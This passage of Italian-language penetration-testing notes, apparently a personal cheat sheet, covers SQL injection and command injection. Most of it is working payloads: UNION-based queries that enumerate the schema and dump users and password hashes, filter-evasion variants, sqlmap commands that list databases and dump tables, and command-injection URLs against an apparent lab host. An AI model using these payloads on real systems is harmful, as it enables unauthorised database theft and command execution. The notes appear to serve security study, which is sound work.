SELECT nome, cognome, indirizzo FROM utenti where id '$id'
```

scatenerà l'errore con 4 infatti ci sono 3 colonne.

Altro metodo per capire quante colonne ha una query è il metodo NULL:

```
' union select NULL #
' union select NULL,NULL #
' union select NULL,NULL,NULL #
fino a che non smette di esserci errore
```

Questo serve per utilizzare la union sulle tabelle di servizio dei DBMS che descrivono le tabelle. Questo permette di ottenere la composizione delle tabelle e dell'intero DB.

Una volta trovato il numero di colonne è possibile trovare l'elenco delle tabelle

```
1' UNION SELECT TABLE_NAME, NULL FROM INFORMATION_SCHEMA.TABLES -- 
```

Da qui si possono scoprire le colonne del database prescelto

```
1' UNION SELECT COLUMN_NAME, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' -- 
```

A questo punto dall'elenco fornito si trovano le colonne `user` e `password`

```
1' UNION SELECT User, Password FROM users -- 
```

Che restituisce l'elenco di utenti e password (l'hash delle password).

#### Esempi di query

* I parametri della get interpretano l'ultimo spazio come un typo quindi il browser lo rimuove

  * In questo modo c'è un carattere dopo lo spazio e quindi il browser mantiene il commento
  
    ```
    ' OR 1=1 -- -
    ```
  
  * Manipolando la richiesta da burp
  
    ```
    '%20OR%201=1%20--%20
    ```
  
* Il server rifiuta query con spazi all'interno

  * Usare commenti al posto degli spazi

    ```
    'or/**/1='1
    ```

* La query contiene parametri numerici

  * Non serve mettere gli apici

    ```
    2 or 1=1 -- 
    ```

* La query richiede un valore intero ma controlla solo che l'ultimo carattere sia in intero

  * Mettere un commento con dopo un intero

    ```
    2 or 1=1 -- 5
    ```

* La query richiede valori numerici

  * Provare a mettere uno `\n` dopo il valore intero

    ```
    2
    OR 1=1
    
    2%0aOR%201%3d1
    ```

### SQLmap

Da usarsi soprattutto quando le SQLInjection sono blind. Fa tutto da solo ma è come un carro armato, gli IDS/IPS lo rilevano di sicuro.

Per cercare i campi vulnerabili in una richiesta GET e listare i database:

```bash
# -u 			url target che contiene anche i parametri della get
#				sqlmap si occupa di capire quali sono e di testarli
sqlmap -u "<target>" --cookie="<cookie>" --dbs
```

Per elencare i database, se i campi dati sono inviati con una richiesta POST:

```bash
# -u 				url target
# --data 			dati del form
# --method 			specifica il metodo http
# --cookie 			inserisci i cookie, servono ad esempio 
#					per l'autenticazione PHP
# --batch 			fornisci le risposte di default alle domande
# --dbs				lista i database
# --ignore-code		ignora il codice HTTP 401
# --random-agent	usa un user-agent casuale
# --level			livello dei test da eseguire [1..5] (def. 1)
# --risk 			rischiosità delle query [1..3] (def. 1)
sqlmap -u "<target>" --data "<data>" --method POST --cookie="<cookie>" \
	--batch --dbs --ignore-code=401 --random-agent --level=3 --risk=2
```
Sqlmap ha una funziona automatica per testare i campi dei form, trova tutto da solo e lista i dbs se uno o più campi sono vulnerabili:

```bash
sqlmap -u "<target>" --forms --dbs --batch --random-agent --ignore-code=401
```

Una volta trovati i database si possono listare tutte le tabelle relative ad un database, per farlo basta togliere --dbs dai comandi sopra e aggiungere:

```bash
-D <nomeDB> --tables
```

Trovata una tabella si può fare il dump dell'intero contenuto:

```bash
-D <nomeDB> -T <nomeTabella> --dump
```

## Code injection

Esempi

```url
# ping
http://192.168.56.102/commandexec/example2.php?ip=127.0.0.1; id
http://192.168.56.102/commandexec/example2.php?ip=127.0.0.1 && id
http://192.168.56.102/commandexec/example2.php?ip=127.0.0.456 || id

http://192.168.56.102/commandexec/example2.php?ip=127.0.0.1|id
/commandexec/example3.php?ip=127.0.0.1%7cid

# regex multilinea per controllare l'ip (codificato)
.102/commandexec/example2.php?ip=127.0.0.1%0aid
```

